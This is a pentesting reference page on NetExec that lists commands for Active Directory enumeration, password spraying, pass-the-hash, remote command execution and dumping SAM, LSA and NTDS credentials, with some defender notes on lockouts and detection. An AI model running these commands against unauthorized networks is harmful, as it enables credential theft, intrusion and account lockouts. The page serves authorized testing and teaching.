NetExec (CME)
NetExec (the successor to CrackMapExec) is the Swiss army knife of Active Directory and Windows network pentesting. It automates enumeration and credential “spraying” across multiple hosts and protocols (SMB, WinRM, LDAP, MSSQL, RDP, SSH). Essential in the Windows & AD area (ad-*).
What it does
Section titled “What it does”- validate credentials en masse across many hosts (where does this account work?)- enumerate: shares, users, policies, sessions, group members- execute commands, dump hashes/secrets, and a multitude of modules- supports SMB, LDAP, WinRM, MSSQL, RDP, SSH, FTP, VNC...Basic use (SMB)
Section titled “Basic use (SMB)”nxc smb 10.10.10.0/24 # sweep: hosts, SMB signing, versionnxc smb host -u user -p pass # validate a credentialnxc smb host -u user -p pass --shares # enumerate sharesnxc smb 10.10.10.0/24 -u user -p pass # password spraying across the subnetnxc smb host -u user -H <NThash> # pass-the-hash (see ad-creds)Enumeration and post
Section titled “Enumeration and post”nxc smb host -u u -p p --users / --groups / --sessions / --loggedon-usersnxc smb host -u u -p p --sam / --lsa / --ntds # dump credentials (see ad-creds)nxc ldap host -u u -p p --bloodhound ... # collect for BloodHound (ad-bloodhound)nxc smb host -u u -p p -x 'command' # execute a commandnxc winrm host -u u -p p -x 'whoami' # execution via WinRMPassword spraying (carefully)
Section titled “Password spraying (carefully)”# try ONE password against MANY users (avoids lockouts) -> see ad-spraynxc smb DC -u users.txt -p 'Spring2024!' --continue-on-success# WATCH the lockout policy: bad spraying locks accounts (noise/DoS)Useful markers
Section titled “Useful markers”(Pwn3d!) NetExec marks this when the credential gives admin execution on the host--local-auth local authentication (not domain)# the output quickly summarizes on which hosts an account is admin -> an access mapBlue Team / use
Section titled “Blue Team / use”- NetExec maps fast where a credential works and where it’s admin (Pwn3d!) across the domain.
- It integrates enumeration, spraying (Password Spraying), pass-the-hash (Credential Dumping), and dumping (NTDS/SAM/LSA).
- Watch the lockout policy when spraying: done wrong, it locks accounts (DoS and noise).
- For the defender: its activity (many 4625/4624, share access) is highly detectable (Detection & logging).
Tips and gotchas
Section titled “Tips and gotchas”- Start with
--shares,--users,--pass-polto enumerate before spraying; respect the lockout policy. - Common mistake: aggressive spraying that locks out domain accounts; 1 try per account and wait the window.
- Use the right module and save the loot;
--ntdsonly with domain admin; it flags the host with(Pwn3d!). - It supports protocols beyond SMB (WINRM, LDAP, MSSQL, SSH); pick the one that fits the target.
Testing checklist
Section titled “Testing checklist”- SMB sweep of the subnet (signing, versions, hosts)
- Validate credentials and find (Pwn3d!) across the domain
- Enumerate shares/users/groups/sessions
- Password spraying respecting the lockout policy (Password Spraying)
- Pass-the-hash where applicable (Credential Dumping)
- Collection for BloodHound (BloodHound)
- Credential dump with a privileged account (Credential Dumping)